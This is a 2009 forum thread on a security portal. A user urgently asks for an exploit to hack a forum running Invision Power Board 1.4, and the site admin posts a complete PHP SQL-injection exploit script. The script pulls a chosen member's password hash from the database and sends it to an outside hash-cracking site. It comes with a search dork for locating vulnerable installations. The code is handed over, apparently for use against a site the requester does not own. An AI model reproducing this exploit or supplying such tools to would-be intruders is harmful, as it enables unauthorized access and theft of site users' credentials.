Waraxe IT Security Portal
Login or Register
October 21, 2025
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 297
Members: 0
Total: 297
Full disclosure
Google Firebase hosting suspension / "malware distribution"bypass
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Invision Power Board -> I REALLY NEED HELP IN HACKING FORUM!!! ~*PLZ HELP*~
Post new topicReply to topic View previous topic :: View next topic
I REALLY NEED HELP IN HACKING FORUM!!! ~*PLZ HELP*~
PostPosted: Thu Mar 19, 2009 11:17 am Reply with quote
BenMix2
Advanced user
Advanced user
Joined: Jan 08, 2009
Posts: 65




I really need an Exploit for Invision Power Board 1.4, Please I really need it, very urgently.
Also, if you have any exploit that works on that system, please give it to me.

Thanks.
View user's profile Send private message
plzplzplz
PostPosted: Thu Mar 19, 2009 2:46 pm Reply with quote
BenMix2
Advanced user
Advanced user
Joined: Jan 08, 2009
Posts: 65




*up*
plz plz help!
i really need this!!!!
View user's profile Send private message
PostPosted: Thu Mar 19, 2009 3:16 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




This is something I found for IPB 1.4, maybe works, maybe not ... just try it ...

Code:

<?php
//----------------------------------------------------------------------------------------------------//
// Invision Power Board Calendar SQL Injection Exploit
// Found by WaReZ
// Dork : "Powered by Invision Power Board (U) v1.4 Final 2005 IPS"
//----------------------------------------------------------------------------------------------------//
// Coded by Pr0T3cT10n < Pr0T3cT10n@Gmail.Com >
// KamikaZ-Team
// ISRAEL
//----------------------------------------------------------------------------------------------------//
set_time_limit(0);
ignore_user_abort(0);
function pull_out_md5($site, $path, $id)
{
echo('<div align="left" class="text">Exploiting..<br />');
$contents = file_get_contents('http://www.' .$site.$path. 'index.php?act=calendar&m=3&y=2008+AND+1=0+UNION+SELECT+1,id,2008,3,1,password,password,0x2A,password,password,password,password,password,password,password,password,password,password,password,password,password+FROM+ibf_members+where+id+=+' .$id. '+UNION+SELECT+*+FROM+ibf_calendar_events+WHERE+1=1');
if(preg_match("/eventid\=1\'\>([a-z0-9]+)\</", $contents, $matches))
{
echo('Found hash(' .$matches[1]. ')!<br />Try to crack it..<br />');
$md5_search = file_get_contents('http://gdataonline.com/qkhash.php?mode=txt&hash=' .$matches[1]);
if(preg_match("/<td width=\"35%\"><b>(.*)<\/b><\/td>/", $md5_search, $results))
echo('OK, <b>Cracked</b>(<b>' .$matches[1]. ' = ' .$results[1]. '</b>)<br />');
else
{
echo('Failed.<br />');
echo('Hash: ' .$matches[1]);
}
}
echo('</div>');
}
?>
<html dir="ltr">
<head>
<title>Invision Power Board Calendar SQL Injection Exploit</title>
<style>
* { background-color: #000000; font-family: Verdana; color: #999999; }
.text { font-size: 12px; }
a:link, a:visited, a:active { color: #e3e2e2; text-decoration: none; font-size: 11px;}
a:hover { color: #1774ba; font-size: 11px; }
input, textarea, select { background-color: black; color: #a6a6a6; border: solid 1px #363636; }
input:hover, textarea:hover { border-color: #D0D0D0; }
input:focus, textarea:focus { border-color: #F0E80A; color: #FFFFFF; }
</style>
</head>
<body>
<div align="left"><h2><u>Invision Power Board Calendar SQL Injection Exploit</u></h2></div>
<?php
if($_POST['site'] && $_POST['path'] && $_POST['id'] && $_POST['submit'])
pull_out_md5($_POST['site'], $_POST['path'], $_POST['id']);
else
echo('<div align="left"><form method="POST" action="?"><table class="text"><tr><td>Site:</td><td><input type="text" name="site"></td></tr><tr><td>Path:</td><td><input type="text" name="path"></td></tr><tr><td>User ID:</td><td><input type="text" name="id"></td></tr><tr><td><input type="submit" name="submit" value="Submit"></td></tr></table></form></div>');
?>
</body>
</html>
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu Mar 19, 2009 6:13 pm Reply with quote
BenMix2
Advanced user
Advanced user
Joined: Jan 08, 2009
Posts: 65




thank you man!
View user's profile Send private message
I REALLY NEED HELP IN HACKING FORUM!!! ~*PLZ HELP*~
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.041 Seconds